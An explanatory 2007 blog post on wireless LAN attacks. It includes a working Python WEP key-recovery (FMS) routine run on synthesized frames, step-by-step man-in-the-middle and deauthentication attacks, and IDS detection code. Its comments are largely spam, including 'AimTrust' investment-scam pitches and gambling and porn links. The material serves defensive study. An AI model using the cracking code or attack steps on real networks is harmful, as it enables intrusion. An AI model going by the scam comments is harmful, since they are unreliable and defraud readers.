Saturday, April 28, 2007

Want To Know Generally About Wireless Hacking?

Wireless Attacks Explained


Intro
Wireless LANs are popping up here, there and everywhere. Many businesses are implementing wireless LAN segments on their internal LANs because it is easy to setup and obviously there are no wires to run.

Wireless allows users with laptops and other mobile devices to roam the enterprise and not have to plug in wherever they go. As part of the process of implementing a wireless network segment on the corporate LAN of the company that I presently work for, I did some research and testing of wireless security. This white paper outlines how hackers are exploiting vulnerabilities in 802.11 wireless LANs and the widely available wireless hacking tools that are used.

Too often people assume that because setting up a wireless segment is literally plug and go, everything is functioning properly and securely. Wireless is a virtual playground for hackers: the technology is still quite new, most admins are nowhere near up to speed on it, and security protocols and procedures are still being developed, giving quick-learning hackers the edge.

Any wireless access point attached to a network segment essentially bridges the internal network to the surrounding area directly, without any firewall protection. After installing only one low-budget wireless access point (WAP) I could get access to the LAN anywhere in the shop, the office and in the parking lot! I don't know how many square feet of shop floor and office space we have, but it isn't small. I was getting 15% connection strength sitting in my car in the parking lot! Without proper authentication and encryption, any laptop with a wireless card can access the network or stealthily listen in on all network traffic across that access point from anywhere within the WAP's range.

It is important to realize the potential for rogue wireless access points in an enterprise. A WAP can be hooked up by anyone: take the cable plugged into your computer, plug it into a WAP, put a wireless card into your PC and you now have a wireless segment. The network admins wouldn't even know unless they are actively looking for it. There are several documented cases of rogue WAPs found in corporations and universities.

The Hacker's WLAN toolbox:
This section provides a few examples of the hardware and freeware tools available.

Freeware Tools:
New wireless LAN hacking tools are introduced every week and are widely available on the Internet for anyone to download. The list below covers some of these tools:

Netstumbler (www.netstumbler.com): Freeware wireless access point identifier. Actively sends probe requests and records the access points that answer, with their SSIDs, channels and signal strength.
Kismet (www.kismetwireless.net): Freeware wireless sniffer and monitor. Passively monitors wireless traffic and sorts the data to identify SSIDs, MAC addresses, channels and connection speeds.
Wellenreiter (packetstormsecurity.nl): Freeware WLAN discovery tool. Uses brute force to identify low-traffic access points, hides your real MAC and integrates with GPS.
THC-RUT (www.thehackerschoice.com): Freeware network discovery tool (ARP, ICMP and DHCP probing) for mapping a segment once you are on it; it is not 802.11-specific despite often being listed among the wireless tools.
Ethereal (www.ethereal.com, since renamed Wireshark): Freeware protocol analyzer. Interactively browse the capture data, viewing summary and detail information for all observed wireless traffic.
WEPCrack (wepcrack.sourceforge.net): Freeware encryption breaker. Cracks 802.11 WEP keys using the Fluhrer-Mantin-Shamir weakness in RC4 key scheduling.
AirSnort (airsnort.shmoo.com): Freeware encryption breaker. Passively monitors transmissions and computes the WEP key once enough weak-IV packets have been gathered.
HostAP (hostap.epitest.fi): Linux driver that converts a WLAN station into a functioning access point (available for WLAN cards based on Intersil's Prism2/2.5/3 chipset).


Antennas:
To connect with wireless LANs from distances greater than a few hundred feet, sophisticated hackers use long-range antennas that are either commercially available or home built and can pick up 802.11 signals from up to 2,000 feet away. The intruders could be in the parking lot or completely out of sight.

Breaking Encryption:
The industry's initial encryption technology, WEP, was quickly broken by the published tools WEPCrack and AirSnort, which exploit a weakness in how WEP keys RC4: the 24-bit per-packet IV is simply prepended to the static secret key, and for certain "weak" IVs the first byte of RC4 output leaks information about one byte of the secret key (the Fluhrer-Mantin-Shamir attack on the RC4 key schedule). Because every WEP data frame starts with the same LLC/SNAP byte (0xAA), that first keystream byte is known for every captured frame. The tools therefore passively observe WLAN traffic until enough weak-IV frames have been collected, then recover the key byte by byte by majority vote.
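The following is an added example, not code from the original article or from WEPCrack/AirSnort: a minimal model of WEP's RC4 keying (per-packet key = 3-byte IV followed by the secret key) and the Fluhrer-Mantin-Shamir weak-IV attack sketched above, run against frames synthesized in the file itself. The 40-bit secret key, the IV set and the use of only the classic (B+3, 0xFF, X) weak IVs are assumptions made for the demonstration; real tools also use the larger "resolved" IV classes and need far more frames because weak IVs are rare in live traffic.

```python
"""
Added example (not from the original article): a minimal WEP/RC4 model and
the Fluhrer-Mantin-Shamir (FMS) weak-IV key recovery that WEPCrack and
AirSnort implemented. All frames are synthesized below; nothing touches a radio.
"""
from collections import Counter

SNAP_DSAP = 0xAA   # first plaintext byte of every WEP data frame (LLC/SNAP header)
KEY_LEN = 5        # WEP-40: five secret key bytes follow the 3-byte IV


def rc4_ksa(key, rounds=256):
    """RC4 key scheduling. Returns (S, j) after `rounds` swaps so the attack can
    inspect the partially scheduled state; 256 rounds is the real KSA."""
    S = list(range(256))
    j = 0
    for i in range(rounds):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_keystream_byte(key):
    """First output byte of RC4's PRGA for the given key."""
    S, _ = rc4_ksa(key)
    i = 1
    j = S[i]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % 256]


def wep_encrypt_first_byte(iv, secret):
    """Ciphertext of the first data byte: what a passive sniffer actually sees."""
    return SNAP_DSAP ^ rc4_first_keystream_byte(bytes(iv) + bytes(secret))


def fms_weak_ivs(byte_index):
    """IVs (B+3, 0xFF, X) drive the KSA into the 'resolved' state that leaks
    secret key byte B through the first keystream byte."""
    return [bytes([byte_index + 3, 0xFF, x]) for x in range(256)]


def fms_recover_key(packets, key_len=KEY_LEN):
    """packets: iterable of (iv, first_ciphertext_byte). Recovers the secret
    key one byte at a time; byte B needs bytes 0..B-1 to be known already."""
    recovered = bytearray()
    for B in range(key_len):
        votes = Counter()
        for iv, ct in packets:
            # Schedule only the known prefix: IV plus the bytes already recovered.
            S, j = rc4_ksa(bytes(iv) + bytes(recovered), rounds=B + 3)
            # Resolved condition after step B+2: S[0] == B+3 and S[1] == 0. If the
            # remaining KSA steps leave positions 0, 1 and B+3 alone (about 5% of
            # the time) the first PRGA output is S[j + S[B+3] + K[B+3]], so the
            # observed keystream byte points straight at K[B+3]. Any IV that
            # reaches this state is usable, not only the (B+3, 0xFF, X) class.
            if S[0] != B + 3 or S[1] != 0:
                continue
            keystream0 = ct ^ SNAP_DSAP                 # known plaintext
            candidate = (S.index(keystream0) - j - S[B + 3]) % 256
            votes[candidate] += 1                       # ~5% right, rest ~uniform noise
        if not votes:
            raise ValueError(f"no resolved IVs for key byte {B}")
        recovered.append(votes.most_common(1)[0][0])
    return bytes(recovered)


def build_sample_capture(secret):
    """Constructed capture: one frame for every FMS weak IV of every key byte."""
    packets = []
    for B in range(len(secret)):
        for iv in fms_weak_ivs(B):
            packets.append((iv, wep_encrypt_first_byte(iv, secret)))
    return packets


if __name__ == "__main__":
    secret = bytes([0x1F, 0x22, 0xC3, 0x4D, 0x05])     # constructed demo key
    capture = build_sample_capture(secret)
    print("recovered", fms_recover_key(capture).hex(), "from", len(capture), "frames")
```

The vote for the right byte wins with only a few hundred weak-IV frames per key byte because each wrong candidate is spread almost uniformly over 256 values; that statistical edge, not any repetition in the ciphertext, is what the tools exploit. Changing the key often, or filtering weak IVs in firmware as some vendors later did, only slows the attack down; it does not fix the design.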

Authentication:
The next step in the evolution of wireless LAN security was the introduction of 802.1X for port-based authentication. However, papers were published soon afterwards showing how the newly proposed standard could be defeated, for example by a man in the middle who exploits the one-way (client-only) authentication and the unauthenticated EAP-Success message (Mishra and Arbaugh, 2002). A replacement standard was expected within two years; it arrived as 802.11i (WPA2) in 2004, which keeps 802.1X/EAP for authentication but replaces WEP with AES-CCMP and adds a four-way handshake that authenticates both sides.

War Driving:
War driving is simply driving around in a car to discover unprotected wireless LANs. Windows-based freeware tools such as NetStumbler probe the airwaves in search of access points that answer probe requests and broadcast their SSIDs, offering an easy way to find open networks. More advanced tools such as Kismet were then introduced on Linux platforms to passively monitor wireless traffic, which also catches access points that do not answer probes.

Both Netstumbler and Kismet work in tandem with a global positioning system (GPS) to map exact locations of the identified WLANs. These maps and data are posted on web sites such as www.wigle.net and www.wifinder.com.


Attacks explained

Malicious Association:
Using widely available tools, hackers can force unsuspecting stations to connect to an undesired 802.11 network or alter the configuration of the station to operate in ad-hoc networking mode. A hacker begins this attack by using the freeware HostAP driver to convert the attacking station into a functioning access point. When the victim's station broadcasts a probe looking for an access point, the hacker's malicious access point answers the association request and a connection between the two begins. After handing the victim an IP address (if needed), the malicious access point can begin its attacks. The hacker, acting as the access point, can use a wealth of hacking tools that have been tested and proven in a wireless environment, and can exploit any vulnerability on the victim's laptop, which can include installing HostAP on it (turning the victim into another rogue access point) or making any other configuration or software change.
The malicious association attack shows that wireless LANs are subject to diversion and stations do not always know which network or access point they connect to. Stations can be tricked or forced to connect to a malicious access point. Even wireless LANs that have deployed VPNs are vulnerable to malicious associations. This attack does not try to break the VPN. Rather, it takes over the security-poor client.

Enterprises must monitor the airwaves of their wireless LAN to make sure their stations only connect to authorized access points and networks. Monitoring the network is the only way to know whom your stations connect to and which stations connect to your access points.

MAC Spoofing - Identity theft:
Many enterprises secure their wireless LAN with authentication based on an authorized list of MAC addresses. While this provides a low level of security for smaller deployments, MAC addresses were never intended to be used in this manner. Any user can easily change the MAC address of a station or access point to change its 'identity' and defeat MAC address-based authentication.

Software tools such as Kismet or Ethereal make it easy for hackers to pick off the MAC address of an authorized user. The hacker then assumes that user's identity by asserting the stolen MAC address as his own (a one-line change on most operating systems) and connects to the wireless LAN as an authorized user.

By monitoring the airwaves of their wireless LAN, enterprises can detect MAC spoofing by noticing when the same MAC address is active in two places at once, for example when frames from one address carry two interleaved 802.11 sequence-number streams. Wireless LAN intrusion detection systems also identify a spoofed MAC by analyzing the vendor "fingerprints" of the wireless LAN card (the OUI of the address and driver-specific behaviour). This lets the IDS see when, for example, an Orinoco wireless LAN card connects to the network using the MAC address of a Cisco WLAN card.

Man-in-the-middle Attacks:
As one of the more sophisticated attacks, a man-in-the-middle attack can break a secure VPN connection between an authorized station and an access point. By inserting a malicious station between the victim station and the access point, the hacker becomes the "man in the middle" as he tricks the station into believing that he is the access point and tricks the access point into thinking he is the station.

This attack preys upon authentication implementations in which the access point periodically forces a connected station to re-authenticate. The station must answer a random challenge from the access point, and the access point must answer a correct challenge response with a success packet.

To begin this attack, the hacker passively observes the station as it connects to the access point, and the hacker collects the authentication information, including the username, server name, client and server IP address, the ID used to compute the response, and the challenge and associate response.

The hacker then tries to associate with the access point by sending a request that appears to come from the authenticated station. The access point sends the VPN challenge to the authenticated station, which computes the required authentic response and sends it to the access point. The hacker observes the valid response. The hacker then acts as the access point and presents a challenge to the authorized station. The station computes the appropriate response, which is sent to the access point. The access point then sends the station a success packet with an embedded sequence number. Both are captured by the hacker. After capturing all this data, the hacker has what he needs to complete the attack and defeat the VPN. The hacker sends a spoofed reply with a large sequence number (e.g. 0x00ffffff), which bumps the victim's station off the network and keeps it from re-associating. The hacker then enters the network as the authorized station.

Only 24/7 monitoring and a highly capable wireless IDS can detect this type of attack on a wireless LAN. An effective security solution must first keep a constant watch over the wireless LAN while it analyzes the activity it observes.

Denial-of-Service Attacks:
Every network and security manager fears the downtime and loss of productivity from a crippling Denial-of-Service attack. In the wireless world, this damaging attack can come from any direction, and the most basic variations of DoS attacks can be just as worrisome as the most sophisticated.

Because 802.11b wireless LANs operate in the unlicensed 2.4 GHz ISM band that is also used by microwave ovens, baby monitors and cordless phones, commonly available consumer products give hackers the tools for a simple and extremely damaging DoS attack. Flooding the band with noise from such devices jams the airwaves and shuts down a wireless LAN.

Hackers can launch more sophisticated DoS attacks by configuring a station to operate as an access point. Posing as the access point, the hacker floods the airwaves with forged disassociation or deauthentication frames that force all stations within range to disconnect from the wireless LAN. In another variation, the hacker's malicious access point broadcasts a disassociation every few minutes so that stations are continually kicked off the network, reconnect, and are kicked off again. These attacks work because management frames are not authenticated in the original 802.11 standard: any station that knows the access point's MAC address can forge them, and a deauthentication sent to the broadcast address clears the whole cell at once. Protection for management frames was only added later, in 802.11w.
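The following is an added example, not code from the original article or from any product it mentions. It builds and parses the 24-byte 802.11 management frame header and runs two of the detection heuristics a wireless IDS of the kind described above would apply to a capture: a deauthentication/disassociation flood from one transmitter (this section) and one MAC address used by two stations at once, exposed by the 12-bit sequence counter (the MAC spoofing section). The capture, the addresses, the time window and the thresholds are all constructed for the demonstration.

```python
"""
Added example, not from the original article: 802.11 management frame
builder/parser plus two wireless-IDS heuristics run over a constructed capture.
"""
import struct
from collections import defaultdict

TYPE_MGMT = 0
SUBTYPE_PROBE_REQ = 0x4
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
FLAG_RETRY = 0x08                  # frame-control flag: retransmission
BROADCAST = "ff:ff:ff:ff:ff:ff"
HDR = "<HH6s6s6sH"                 # frame ctl, duration, addr1-3, seq ctl (little-endian)


def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, da, sa, bssid, seq, body=b"", retry=False):
    """24-byte MAC header plus optional body. Frame control low byte is
    version(2) | type(2) | subtype(4); the high byte holds the flags."""
    frame_control = (subtype << 4) | (TYPE_MGMT << 2) | ((FLAG_RETRY if retry else 0) << 8)
    seq_ctrl = (seq & 0xFFF) << 4  # fragment number 0 in the low nibble
    return struct.pack(HDR, frame_control, 0, mac_to_bytes(da),
                       mac_to_bytes(sa), mac_to_bytes(bssid), seq_ctrl) + body


def parse_header(frame):
    fc, _duration, a1, a2, a3, sc = struct.unpack_from(HDR, frame, 0)
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF, "flags": fc >> 8,
            "da": bytes_to_mac(a1),      # destination / receiver
            "sa": bytes_to_mac(a2),      # transmitter: whoever actually sent it
            "bssid": bytes_to_mac(a3), "seq": sc >> 4, "frag": sc & 0xF}


def detect_deauth_flood(capture, window_s=1.0, threshold=10):
    """capture: list of (timestamp, frame). Returns transmitters that sent more
    than `threshold` deauth/disassoc frames inside any `window_s` interval; a
    real AP has no reason to deauthenticate the broadcast address that often."""
    times = defaultdict(list)
    for ts, frame in capture:
        h = parse_header(frame)
        if h["type"] == TYPE_MGMT and h["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            times[h["sa"]].append(ts)
    flooders = []
    for sa, stamps in times.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):           # sliding window over timestamps
            while stamps[end] - stamps[start] > window_s:
                start += 1
            if end - start + 1 > threshold:
                flooders.append(sa)
                break
    return flooders


def detect_seq_anomalies(capture, max_gap=64):
    """One transmitter has one sequence counter, advancing by one per new frame
    (mod 4096). A spoofer reusing the MAC runs its own counter, so the merged
    stream jumps by far more than lost frames explain. Retries (retry flag)
    legitimately repeat a number and are skipped."""
    last_seq, alerts = {}, []
    for ts, frame in capture:
        h = parse_header(frame)
        if h["flags"] & FLAG_RETRY:
            continue
        sa, seq = h["sa"], h["seq"]
        if sa in last_seq:
            delta = (seq - last_seq[sa]) % 4096
            if delta == 0 or delta > max_gap:
                alerts.append((ts, sa, last_seq[sa], seq))
        last_seq[sa] = seq
    return alerts


def build_sample_capture():
    """Constructed capture; the OUIs mimic an Orinoco card and a Cisco AP but
    the addresses are made up."""
    ap, station = "00:40:96:aa:bb:cc", "00:02:2d:11:22:33"
    capture = []
    for k in range(6):     # legitimate station: counter 100, 101, ... every 100 ms
        capture.append((0.1 * k, build_mgmt_frame(SUBTYPE_PROBE_REQ, BROADCAST, station, BROADCAST, 100 + k)))
    for k in range(3):     # spoofer asserting the station's MAC, own counter from 2000
        capture.append((0.15 + 0.2 * k, build_mgmt_frame(SUBTYPE_PROBE_REQ, BROADCAST, station, BROADCAST, 2000 + k)))
    for k in range(20):    # forged AP: 20 broadcast deauths in 0.2 s, reason code 7
        capture.append((1.0 + 0.01 * k, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap, ap, 500 + k, struct.pack("<H", 7))))
    capture.sort(key=lambda entry: entry[0])
    return capture


if __name__ == "__main__":
    cap = build_sample_capture()
    print("deauth flood from:", detect_deauth_flood(cap))
    for ts, sa, prev, cur in detect_seq_anomalies(cap):
        print(f"t={ts:.2f}s {sa}: seq {prev} -> {cur} (second station on this MAC?)")
```

Both checks need a monitor that hears every frame in the cell, which is why the article keeps returning to continuous airwave monitoring: a sensor that only sees the wired side of the access point never sees a forged deauthentication at all. The sequence-number check is a heuristic; a station that roams or drops many frames can trip it, so tune `max_gap` against your own traffic before alerting on it.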

In addition to malicious disassociation attacks, hackers are now abusing the Extensible Authentication Protocol (EAP) to launch DoS attacks. Because EAPOL messages are not authenticated either, a hacker can target wireless stations and access points with forged EAPOL-Logoff frames (dropping an authenticated station), EAPOL-Start floods (tying up the authenticator), premature EAP-Success messages, EAP-Failure messages, and other manipulations of the EAP exchange.

Conclusion:
To better secure a wireless network segment, a layered approach should be used. Similar to a wired network infrastructure, I have implemented several security features that each alone would not be sufficient, but together with monitoring create a much more secure WLAN. On my network there is only one access point and one wireless user to date, so the traffic can be monitored from an old laptop that I have on my desk running Red Hat. I occasionally boot it up and trap sections of traffic to look for any attack signatures. We are also not located in a city or industrial complex, and our grounds are quite large and secured. The user is connecting via a VPN, the access point is secured so it cannot be reset, WEP is enabled, the access point is positioned to limit travel of the radio signal outside the building, and my MAC address and the mobile user's are the only two registered with the access point. I also check for rogue access points, as every other laptop user wants to be mobile now as well. The traffic between the access point and the LAN passes through a firewall to help block any possible DoS attacks on the wireless LAN from entering the enterprise LAN.

Wireless networks are a great alternative or addition to Ethernet networks: they can bridge two traditional cabled Ethernet segments or allow laptop users to wander the enterprise and stay connected to the LAN at all times. WLANs are definitely here to stay, but they pose definite security issues.


14 comments:

Anonymous said...

I would like to read the article but it is impossible to see green on black.

Get some web skllz dude.

Biggest_Baddest_Wolf said...

About the article:
The author adds to what many are voicing already, and have been voicing for a while; that people need to be aware of how their stuff is set up, and act upon that awareness by taking a good look at how to secure their stuff.
I'm all for "open access anywhere" but I'm also for spreading the knowledge so companies can stay in business and pay their employees and offer their services without as much risk.

About the green on black:
I can read it just fine, the commenter should get a better monitor and some glasses.

Anonymous said...

Hello !.
You re, I guess , perhaps curious to know how one can collect a huge starting capital .
There is no initial capital needed You may begin to get income with as small sum of money as 20-100 dollars.

AimTrust is what you need
AimTrust represents an offshore structure with advanced asset management technologies in production and delivery of pipes for oil and gas.

Its head office is in Panama with structures everywhere: In USA, Canada, Cyprus.
Do you want to become an affluent person?
That`s your choice That`s what you wish in the long run!

I feel good, I began to take up income with the help of this company,
and I invite you to do the same. It`s all about how to choose a correct partner who uses your funds in a right way - that`s AimTrust!.
I take now up to 2G every day, and my first investment was 500 dollars only!
It`s easy to join , just click this link http://qytuduxap.arcadepages.com/rikavyg.html
and lucky you`re! Let`s take our chance together to become rich

Anonymous said...

Hello !.
You may , perhaps very interested to know how one can reach 2000 per day of income .
There is no initial capital needed You may start to receive yields with as small sum of money as 20-100 dollars.

AimTrust is what you need
AimTrust incorporates an offshore structure with advanced asset management technologies in production and delivery of pipes for oil and gas.

It is based in Panama with structures everywhere: In USA, Canada, Cyprus.
Do you want to become a happy investor?
That`s your chance That`s what you desire!

I feel good, I began to get income with the help of this company,
and I invite you to do the same. It`s all about how to select a proper companion utilizes your savings in a right way - that`s it!.
I earn US$2,000 per day, and my first deposit was 1 grand only!
It`s easy to start , just click this link http://aduqujikig.jamminweb.com/dilihihu.html
and lucky you`re! Let`s take this option together to become rich

Anonymous said...

Can anyone recommend the robust Network Monitoring system for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central remote windows login
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!

Anonymous said...

Hello!
You may probably be very interested to know how one can make real money on investments.
There is no initial capital needed.
You may begin to get income with a money that usually is spent
on daily food, that's 20-100 dollars.
I have been participating in one company's work for several years,
and I'll be glad to share my secrets at my blog.

Please visit blog and send me private message to get the info.

P.S. I make 1000-2000 per daily now.

[url=http://theblogmoney.com] Online investment blog[/url]

Anonymous said...

Hi there!
I would like to burn a theme at here. There is such a thing, called HYIP, or High Yield Investment Program. It reminds of financial piramyde, but in rare cases one may happen to meet a company that really pays up to 2% daily not on invested money, but from real profits.

For quite a long time, I earn money with the help of these programs.
I'm with no money problems now, but there are heights that must be conquered . I get now up to 2G a day , and my first investment was 500 dollars only.
Right now, I managed to catch a guaranteed variant to make a sharp rise . Turn to my blog to get additional info.

http://theblogmoney.com

Anonymous said...

Hi!
You may probably be very interested to know how one can manage to receive high yields on investments.
There is no need to invest much at first.
You may begin to get income with a money that usually is spent
on daily food, that's 20-100 dollars.
I have been participating in one project for several years,
and I'm ready to share my secrets at my blog.

Please visit my pages and send me private message to get the info.

P.S. I make 1000-2000 per daily now.

http://theinvestblog.com [url=http://theinvestblog.com]Online Investment Blog[/url]

Anonymous said...

[B]NZBsRus.com[/B]
Lose Idle Downloads With NZB Files You Can Swiftly Find High Quality Movies, PC Games, MP3s, Applications & Download Them @ Fast Rates

[URL=http://www.nzbsrus.com][B]NZB[/B][/URL]

Anonymous said...

Glad to greet you, ladies and gentlemen!

For sure you didn’t here about me yet,
my name is Nikolas.
Generally I’m a social gmabler. all my life I’m carried away by online-casino and poker.
Not long time ago I started my own blog, where I describe my virtual adventures.
Probably, it will be interesting for you to find out about my progress.
Please visit my web page . http://allbestcasino.com I’ll be glad would you find time to leave your opinion.

Anonymous said...

Glad to greet you, ladies and gentlemen!

We are not acquainted yet? It’s easy to fix,
my name is Peter.
Generally I’m a venturesome gambler. all my life I’m carried away by online-casino and poker.
Not long time ago I started my own blog, where I describe my virtual adventures.
Probably, it will be interesting for you to read my notes.
Please visit my web page . http://allbestcasino.com I’ll be glad would you find time to leave your opinion.

Anonymous said...

sex [url=http://pornushi.ru/english-version/young-girls-pussys/site-402.html]escort girl 34[/url]

Anonymous said...

Hi, I'm a newbie here, but I already want to bring all the benefits of me :) So, I want to share my experience with you..
9 days ago, accidentally, i had found the Mobile Phone TV...and I was so delighted with this application
that I decided to talk to you :)

I consider myself a bit of a road warrior. I am on and off jets and through airports at least twice,
usually 4 times a week. I can catch up on news, watch a Discovery program, check up on the stock market or just find something interesting.
The live guide works like cable at home and the connection speed is very good. All in ALL - I RATE A 5 Star program!

but I do not want to leave any links here, so you can email me fairyalexiss@gmail.com
and i will give you the site of this unusual program :)

(but please don't PM me, because it's so difficult to communicate in such kind of way)

so, I hope I was helpful to you)) see you in next posts ..

sincerely
your Alexis....

p.s. English is not my native language, so sorry for any mistakes :)

Alex said...

Take a look here:

http://hakin9.org?a_aid=olgapawlik&a_bid=8f6377e8

Was a good start for me ;)